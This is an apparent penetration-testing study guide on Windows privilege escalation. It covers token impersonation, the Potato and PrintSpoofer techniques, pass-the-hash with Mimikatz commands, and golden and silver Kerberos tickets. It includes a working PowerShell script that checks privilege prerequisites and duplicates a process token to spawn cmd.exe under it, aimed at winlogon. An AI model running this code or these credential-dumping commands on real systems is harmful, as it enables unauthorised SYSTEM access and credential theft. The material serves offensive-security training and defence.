Token Manipulation and Impersonation
Windows access tokens carry the security context of a process or thread: the user SID, group SIDs, privileges and integrity level that the kernel consults on every access check. Because the token is what the system trusts, manipulating tokens is a direct route to privilege escalation. Token impersonation lets a thread run temporarily under another user's token, so a process that can obtain a token belonging to a privileged user (by duplicating it from a process or thread handle it is allowed to open, or by impersonating a privileged client that connects to a named pipe or RPC endpoint it controls) can escalate to that user immediately. Tools such as Incognito automate this, but the underlying Win32 APIs (OpenProcessToken, DuplicateTokenEx, ImpersonateLoggedOnUser, CreateProcessWithTokenW) are available to any program.
SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are what make these attacks work. Neither lets a process open arbitrary processes; they allow it to impersonate (or assign as a primary token to a new process) any token it has already obtained, including one belonging to a SYSTEM client that connected to a server the process controls. Windows grants both to service accounts by default, so IIS application pool identities and SQL Server service accounts commonly hold them. Rotten Potato, Juicy Potato and PrintSpoofer exploit exactly this: they coerce a SYSTEM process into authenticating to an endpoint the attacker controls (DCOM activation in the Potato family, a print spooler callback to an attacker-owned named pipe in PrintSpoofer), capture the resulting token, and use it to start a SYSTEM process. A quick check is `whoami /priv`: if either privilege is listed and the coercion primitive is available (for PrintSpoofer, the Spooler service running), the path to SYSTEM is usually short. Understanding Windows authentication internals explains why these seemingly obscure privileges amount to complete compromise.
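The following PowerShell is an added example, not code from the original page or from any of the tools named above. It first checks whether the current token holds the two privileges the Potato family relies on (and whether the Spooler service is running), then uses the Win32 token APIs via P/Invoke to duplicate a token from a process this session can open and spawn a new process under it. It assumes a Windows host with PowerShell 5.1 or later and an English `whoami /priv` column layout. The direct duplication step requires being able to open the target process, which a plain IIS or SQL Server service account cannot do for SYSTEM processes; those accounts must instead coerce a SYSTEM client into connecting to them, which is what Rotten Potato, Juicy Potato and PrintSpoofer automate. The function and type names are this example's own.

```powershell
# Added example: Potato prerequisite check plus a minimal token-duplication demo.
# Assumes Windows, PowerShell 5.1+, English 'whoami /priv' output.

function Get-ImpersonationPrivilegeState {
    # Parse 'whoami /priv' for the two privileges of interest. Columns are separated by 2+ spaces.
    whoami /priv | Select-String -Pattern 'SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege' |
        ForEach-Object {
            $cols = $_.Line -split '\s{2,}'
            [pscustomobject]@{ Privilege = $cols[0]; State = $cols[-1] }
        }
}

function Test-PotatoPrerequisites {
    $privs = Get-ImpersonationPrivilegeState
    [pscustomobject]@{
        HasImpersonate   = [bool]($privs | Where-Object Privilege -eq 'SeImpersonatePrivilege')
        HasAssignPrimary = [bool]($privs | Where-Object Privilege -eq 'SeAssignPrimaryTokenPrivilege')
        # PrintSpoofer needs only a running Spooler service, which is why it is the usual choice
        # on current builds where Juicy Potato's DCOM coercion no longer works (Windows 10 1809 / Server 2019 and later).
        SpoolerRunning   = (Get-Service -Name Spooler -ErrorAction SilentlyContinue).Status -eq 'Running'
        Build            = [System.Environment]::OSVersion.Version.Build
    }
}

# P/Invoke declarations for the token APIs (hypothetical helper type name: TokenNative).
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class TokenNative {
    public const uint TOKEN_DUPLICATE = 0x0002, TOKEN_QUERY = 0x0008, MAXIMUM_ALLOWED = 0x02000000;
    public const int SecurityImpersonation = 2, TokenPrimary = 1;
    public const uint CREATE_NEW_CONSOLE = 0x10;

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO {
        public int cb; public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }

    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool OpenProcessToken(IntPtr hProcess, uint access, out IntPtr hToken);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool DuplicateTokenEx(IntPtr hToken, uint access, IntPtr attrs, int level, int type, out IntPtr hNew);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithTokenW(IntPtr hToken, uint logonFlags, string app, string cmd,
        uint creationFlags, IntPtr env, string cwd, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
}
'@

function Start-ProcessWithStolenToken {
    param(
        [Parameter(Mandatory)][int]$ProcessId,
        [string]$CommandLine = 'C:\Windows\System32\cmd.exe'
    )
    # Opening the process is the step that needs admin/SeDebugPrivilege for SYSTEM targets.
    $hProc = (Get-Process -Id $ProcessId).Handle
    $hTok = [IntPtr]::Zero
    if (-not [TokenNative]::OpenProcessToken($hProc, [TokenNative]::TOKEN_DUPLICATE -bor [TokenNative]::TOKEN_QUERY, [ref]$hTok)) {
        throw "OpenProcessToken failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    # Duplicate into a fresh primary token we own; a new process must be given a primary token.
    $hPrimary = [IntPtr]::Zero
    if (-not [TokenNative]::DuplicateTokenEx($hTok, [TokenNative]::MAXIMUM_ALLOWED, [IntPtr]::Zero,
            [TokenNative]::SecurityImpersonation, [TokenNative]::TokenPrimary, [ref]$hPrimary)) {
        throw "DuplicateTokenEx failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    $si = New-Object TokenNative+STARTUPINFO
    $si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
    $pi = New-Object TokenNative+PROCESS_INFORMATION
    # CreateProcessWithTokenW is the call that requires SeImpersonatePrivilege in the caller's token;
    # CreateProcessAsUser would require SeAssignPrimaryTokenPrivilege instead.
    $ok = [TokenNative]::CreateProcessWithTokenW($hPrimary, 0, $null, $CommandLine,
            [TokenNative]::CREATE_NEW_CONSOLE, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    [void][TokenNative]::CloseHandle($hTok); [void][TokenNative]::CloseHandle($hPrimary)
    if (-not $ok) { throw "CreateProcessWithTokenW failed: $err" }
    $pi.dwProcessId   # PID of the new process running under the duplicated token
}

Test-PotatoPrerequisites
# From an elevated shell, for demonstration: Start-ProcessWithStolenToken -ProcessId (Get-Process winlogon).Id
```

The design point worth noticing is which call needs which privilege: opening the victim process is an ordinary access check, duplicating the token needs only TOKEN_DUPLICATE on that handle, and it is CreateProcessWithTokenW (or CreateProcessAsUser) that checks the caller for SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege). The Potato tools differ from this script only in how they obtain the handle in the first step.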
Pass-the-hash attacks exploit a design property of NTLM: the NT hash itself is the authentication secret, so a hash extracted from LSASS memory or the SAM database can be used directly in the NTLM challenge-response without ever recovering the cleartext password. It is primarily a lateral movement technique, but the hash of a local administrator reused across hosts, or of a domain account with administrative rights elsewhere, turns a foothold on one machine into administrative access on others. Mimikatz, although restricted in the OSCP exam, is the standard demonstration (sekurlsa::logonpasswords to dump credentials, sekurlsa::pth to start a process that authenticates with the hash).
Kerberos ticket forgery can be stealthier than NTLM-based attacks because a forged ticket is presented directly to a service rather than requested through the normal exchange. A silver ticket is a forged service ticket signed with the target service account's key (typically a computer account's NT hash) and is validated by that service alone, so no domain controller sees the request. A golden ticket is a forged TGT signed with the krbtgt account's key and can be exchanged for service tickets to any service in the domain until the krbtgt password is reset twice. Understanding Kerberos fundamentals (the AS exchange that issues a TGT, the TGS exchange that issues service tickets, and the PAC that carries group membership) is what makes both the attack and its detection intelligible. These techniques go beyond OSCP scope, but exposure to the concepts prepares for modern Active Directory assessments.